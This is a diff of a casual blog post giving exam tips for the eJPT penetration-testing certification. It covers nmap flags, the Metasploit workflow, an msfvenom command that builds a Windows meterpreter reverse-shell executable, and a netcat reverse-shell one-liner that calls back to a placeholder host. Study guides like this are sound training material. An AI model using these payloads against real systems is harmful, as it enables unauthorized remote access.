Scro11z/scro11z.github.io/_posts/2025-12-03-EJPT_GUIDE.md

 #### **Nmap?
 Yeah, but not just “nmap (ip)”**
 You gotta go deeper.
-`nmap -sV -sC -p- --open` — that’s your bread and butter.
+`nmap -sV -sC -p- --open` that’s your bread and butter.
-Find services, versions, scripts.
+Find services, versions, use scripts.
 Look for low-hanging fruit.

 And **man pages**?
 Don’t sleep on ‘em.
-If you blank on a command — `man nmap`, `nmap --help`.
+If you blank on a command `man (command)`, `(command) --help`.
 Boom.
 Answers.

 #### **Metasploit = Your Best Friend**
 You *will* use it.
 Learn the flow:
 - `searchsploit [service]` → find an exploit
 - `msfconsole` → `use exploit/...` → `set RHOSTS` → `set LHOST` → `exploit`
 - Get a shell?
 Congrats.
-Now **don’t trip** — `sysinfo`, `getuid`, see what you’re working with.
+Now **don’t trip** `sysinfo`, `getuid`, see what you’re working with.

 And **msfvenom**?
 For payloads.
 `msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f exe > shell.exe`
 Then serve it, get that callback.

 #### **Netcat & Reverse Shells**
-You’ll see “pop a shell” and panic.
-Don’t.
+There are times when you need to pop a shell but dont panic.

 Reverse shell = you send a payload, target connects *back* to you.
-You run: `nc -lvnp 4444`
+You run: `nc -lvnp 4444` (which listens on port 4444)
-They call: `nc YOUR_IP 4444 -e /bin/bash` (Linux)
-Or use [revshells.com](https://www.revshells.com) — cheat code for noobs (and pros who forget).
+They call: `nc YOUR_IP 4444 -e /bin/bash` (Linux)  (they connect back to your open port) Or use [revshells.com](https://www.revshells.com) — cheat code for noobs (and pros who forget).

 ---